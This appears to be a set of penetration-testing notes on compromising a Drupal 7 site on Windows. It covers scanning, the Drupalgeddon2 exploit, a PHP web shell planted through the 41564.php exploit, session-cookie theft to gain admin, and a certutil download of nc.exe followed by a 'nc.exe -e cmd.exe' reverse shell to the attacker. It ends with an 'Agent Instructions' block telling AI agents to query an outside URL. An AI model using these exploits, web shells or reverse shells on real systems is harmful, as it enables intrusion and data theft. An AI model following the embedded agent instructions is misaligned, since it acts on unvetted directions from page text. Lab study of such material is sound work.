# Drupal * [https://www.drupal.org](https://www.drupal.org/) * Open-source web content management framework written in PHP ## Scan ``` nmap -sC -sV -oA output 10.x.x.x 80 IIS 7.5 drupal = Windows 2008 R2 135 rpc 49154 rpc DirBuster found 'rest': /rest/ — 200 http://10.x.x.x ..drupal ``` ## drupscan * Works but too old - last updated like 2013 * github/tibillys ## droopescan * Takes a long time to run * ..Find Version * http\://$IP/robots.txt ``` droopescan --help droopescan scan drupal -u 10.x.x.x version: 7.54 ..Interesting Results Admin: Login page ..But no exploits Theme: seven ctools, libraries, image module ``` ## drupalgeddon (msf) ``` searchsploit drupal 7.5 ``` ## drupalgeddon (no msf) * CVE-2018-7600 * * If you get a 'limited shell' you will need to upload nc.exe and do reverse shell ``` gem install highline ruby drupalgeddon2.rb 10.x.x.x nc -nvlp 4444 certutil -urlcache -split -f http://$MyIP/nc.exe nc.exe -e cmd.exe $MyIP 4444 ``` ## Serialization Vulnerability - 41564.php * Search and Download the php exploit * ippsec includes Custom phpCode for: * Uploading and Execution * Requires php-curl * Exploit will download json files that could have secrets ``` google drupal 7.54 exploits ..found one searchsploit drupal ..found 7.x searchsploit -x 41564.php ..view searchsploit -p 41564.php ..clipboard mv 41564.php drupal.php ..move/rename Confirm rest: http://10.x.x.x/rest_endpoint ..nothing http://10.x.x.x/rest ..ok ``` ``` $url = 'http://10.x.x.x/' $endpoint_path = '/rest_endpoint' ..default/wrong $endpoint_path = '/rest'; ..found by dirbuster $phpCode = <<<'EOD' " . shell_exec($_REQUEST['fexec']) . ""; }; ?> EOD; $file= [ 'filename' => 'ippsec.php', 'data' => $phpCode ]; ``` ``` Exploit: > php drupal.php ``` ## Json Cookies * Exploit will save json files locally * Check them for details, and session cookies to steal * Create a New Cookie, and you might get Admin ``` cat user.json ..user/pass cat session.json ..session/admin/cookie firefox > cookies manager+ (addon) > New Cookie cat session.json session_name = Name: xyz111 session_id = Content: ddddd http://10.x.x.x/ ..we are admin!! ``` ## Dupal PHP Module * If you can access Drupal: * Enable the PHP Filter * Create an Article that has PHP ``` Drupal > Modules > PHP Filter (enable) > save Add Content > Create Article Title: test Body: Format: PHP Code Preview ... we have code execution! ``` ## Webshell * Use the ippsec phpCode * Execute commands and upload ``` http://10.x.x.x/ippsec.php?fexec=dir http://10.x.x.x/ippsec.php?fexec=systeminfo http://10.x.x.x/ippsec.php?fexec=sc query state=all ..denied ``` ## Enumeration * **systeminfo** will tell us the OS version and Patch level * Hotfix 'N/A' might mean we dont have access, or there are no patches * OS/Patch level will help us with KernelExploit ``` OS Ver: 6.1.7600 B/A Build 7600 Hotfix: N/A Kernel Exploit ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/04-webapps/drupal.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.